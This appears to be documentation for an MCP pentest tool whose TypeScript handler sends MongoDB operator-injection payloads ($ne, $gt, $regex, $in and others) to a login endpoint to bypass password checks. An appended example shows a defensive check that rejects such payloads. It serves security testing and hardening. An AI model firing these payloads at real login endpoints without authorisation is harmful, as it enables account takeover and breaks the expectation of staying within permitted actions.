
nosqli_auth_bypass

Test authentication bypass using NoSQL injection by sending payloads that exploit MongoDB query operators like $ne, $gt, and $regex to bypass password validation checks.

Instructions

Test NoSQL operator injection ($ne, $gt, $regex) for authentication bypass. Sends payloads that abuse MongoDB query operators to bypass password checks. E.g., {"username":"admin","password":{"$ne":""}} matches any non-empty password. Returns: {results: [{payload_name, status, length, likely_bypass, snippet}]}. Side effects: Sends POST requests to the login endpoint. May create sessions.

Input Schema

| Name | Required | Description | Default |
|---|---|---|---|
| url | Yes | Login endpoint URL, e.g. https://target/login or https://target/api/auth | |
| username_param | No | JSON field name for username, e.g. 'username' or 'email' | username |
| password_param | No | JSON field name for password | password |
| target_username | No | Username to bypass auth for, e.g. 'admin' | admin |

Implementation Reference

  • The 'nosqli_auth_bypass' tool definition and handler implementation.
    server.tool(
      "nosqli_auth_bypass",
      "Test NoSQL operator injection ($ne, $gt, $regex) for authentication bypass. Sends payloads that abuse MongoDB query operators to bypass password checks. E.g., {\"username\":\"admin\",\"password\":{\"$ne\":\"\"}} matches any non-empty password. Returns: {results: [{payload_name, status, length, likely_bypass, snippet}]}. Side effects: Sends POST requests to the login endpoint. May create sessions.",
      {
        url: z
          .string()
          .describe(
            "Login endpoint URL, e.g. https://target/login or https://target/api/auth"
          ),
        username_param: z
          .string()
          .describe("JSON field name for username, e.g. 'username' or 'email'")
          .default("username"),
        password_param: z
          .string()
          .describe("JSON field name for password")
          .default("password"),
        target_username: z
          .string()
          .describe("Username to bypass auth for, e.g. 'admin'")
          .default("admin"),
      },
      async ({ url, username_param, password_param, target_username }) => {
        requireTool("curl");
    
        const payloads: [string, Record<string, unknown>][] = [
          [
            "$ne_empty",
            { [username_param]: target_username, [password_param]: { $ne: "" } },
          ],
          [
            "$ne_null",
            {
              [username_param]: target_username,
              [password_param]: { $ne: null },
            },
          ],
          [
            "$gt_empty",
            { [username_param]: target_username, [password_param]: { $gt: "" } },
          ],
          [
            "$regex_any",
            {
              [username_param]: target_username,
              [password_param]: { $regex: ".*" },
            },
          ],
          [
            "$exists_true",
            {
              [username_param]: target_username,
              [password_param]: { $exists: true },
            },
          ],
          [
            "both_$ne",
            {
              [username_param]: { $ne: "" },
              [password_param]: { $ne: "" },
            },
          ],
          [
            "$in_array",
            {
              [username_param]: target_username,
              [password_param]: { $in: ["", "password", "admin", "123456"] },
            },
          ],
          [
            "$nin_empty",
            {
              [username_param]: target_username,
              [password_param]: { $nin: [] },
            },
          ],
        ];
    
        // Baseline: legitimate failed login
        const baselineBody = JSON.stringify({
          [username_param]: target_username,
          [password_param]: "definitely_wrong_xyz789",
        });
        const baselineRes = await runCmd("curl", [
          "-sk",
          "-o",
          "-",
          "-w",
          "\n__META__%{http_code}:%{size_download}:%{redirect_url}",
          "-X",
          "POST",
          "-H",
          "Content-Type: application/json",
          "-d",
          baselineBody,
          url,
        ]);
    
        let blBody = baselineRes.stdout;
        const blMetaMarker = blBody.lastIndexOf("__META__");
        let blStatus = 0;
        let blLength = 0;
        if (blMetaMarker !== -1) {
          const meta = blBody.slice(blMetaMarker + 8).trim();
          const parts = meta.split(":");
          blStatus = parts.length > 0 ? parseInt(parts[0], 10) || 0 : 0;
          blLength = parts.length > 1 ? parseInt(parts[1], 10) || 0 : 0;
        }
    
        const results: Array<{
          payload_name: string;
          payload: string;
          status: number;
          length: number;
          redirect: string;
          likely_bypass: boolean;
          response_snippet: string;
        }> = [];
    
        for (const [payloadName, payloadBody] of payloads) {
          const data = JSON.stringify(payloadBody);
          const res = await runCmd("curl", [
            "-sk",
            "-o",
            "-",
            "-w",
            "\n__META__%{http_code}:%{size_download}:%{redirect_url}",
            "-X",
            "POST",
            "-H",
            "Content-Type: application/json",
            "-d",
            data,
            url,
          ]);
    
          let body = res.stdout;
          const metaMarker = body.lastIndexOf("__META__");
          let status = 0;
          let length = 0;
          let redirect = "";
          if (metaMarker !== -1) {
            const meta = body.slice(metaMarker + 8).trim();
            const parts = meta.split(":");
            status = parts.length > 0 ? parseInt(parts[0], 10) || 0 : 0;
            length = parts.length > 1 ? parseInt(parts[1], 10) || 0 : 0;
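            // The redirect URL itself contains ":" (e.g. "https://..."), so rejoin the remaining parts.
            redirect = parts.length > 2 ? parts.slice(2).join(":") : "";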
            body = body.slice(0, metaMarker);
          }
    
          const likelyBypass =
            (status !== blStatus && [200, 302, 303].includes(status)) ||
            (Math.abs(length - blLength) > 50 && status === 200) ||
            Boolean(
              redirect &&
                (redirect.toLowerCase().includes("dashboard") ||
                  redirect.toLowerCase().includes("account"))
            );
    
          results.push({
            payload_name: payloadName,
            payload: data,
            status,
            length,
            redirect,
            likely_bypass: likelyBypass,
            response_snippet: body.slice(0, 500),
          });
        }
    
        const bypasses = results.filter((r) => r.likely_bypass);
        const result = {
          baseline: { status: blStatus, length: blLength },
          results,
          bypass_payloads: bypasses.map((r) => r.payload_name),
          hint:
            bypasses.length > 0
              ? `NoSQL auth bypass detected with: ${JSON.stringify(bypasses.map((r) => r.payload_name))}`
              : "No auth bypass detected. Server may not use MongoDB or properly sanitizes operators.",
        };
    
        return { content: [{ type: "text", text: JSON.stringify(result, null, 2) }] };
      }
    );
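
The payload shapes in the handler above only have an effect when a login endpoint passes parsed JSON values straight into a MongoDB query filter. As an added example (not part of the operant-mcp code; the function names and sample bodies are constructed here), a server-side check that accepts credentials only as plain strings and reports where an operator key appeared, which is also useful as a log signal:

```typescript
// Added example; function and field names are hypothetical, not operant-mcp code.
type Verdict = { ok: boolean; reason: string };

// Walk parsed JSON and return the paths of keys that begin with "$",
// the prefix MongoDB uses for query operators ($ne, $gt, $regex, ...).
function findOperatorKeys(value: unknown, path: string = ""): string[] {
  const found: string[] = [];
  if (value === null || typeof value !== "object") return found;
  const rec = value as Record<string, unknown>;
  for (const key of Object.keys(rec)) {
    const here = path === "" ? key : path + "." + key;
    if (key.charAt(0) === "$") found.push(here);
    for (const p of findOperatorKeys(rec[key], here)) found.push(p);
  }
  return found;
}

// Accept a login body only when both credential fields are plain strings,
// so nothing but literal values can reach the database query filter.
function checkLoginBody(body: unknown, userField: string = "username", passField: string = "password"): Verdict {
  if (body === null || typeof body !== "object" || Array.isArray(body)) {
    return { ok: false, reason: "body is not a JSON object" };
  }
  const ops = findOperatorKeys(body);
  if (ops.length > 0) {
    return { ok: false, reason: "operator key at " + ops.join(", ") };
  }
  const rec = body as Record<string, unknown>;
  if (typeof rec[userField] !== "string" || typeof rec[passField] !== "string") {
    return { ok: false, reason: "credential fields must be strings" };
  }
  return { ok: true, reason: "" };
}

// Constructed request bodies mirroring payload shapes from the listing above,
// plus one non-operator type confusion and one ordinary login.
const sampleBodies: unknown[] = [
  { username: "admin", password: { $ne: "" } },
  { username: "admin", password: { $regex: ".*" } },
  { username: { $ne: "" }, password: { $ne: "" } },
  { username: "admin", password: { $in: ["", "password"] } },
  { username: "admin", password: ["x"] },
  { username: "admin", password: "correct horse" },
];

function runSamples(): Verdict[] {
  return sampleBodies.map((b) => checkLoginBody(b));
}

for (const v of runSamples()) console.log(v.ok ? "accept" : "reject: " + v.reason);
```

Run the check before any database call and compare the submitted password against a stored hash in application code rather than inside the query filter.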
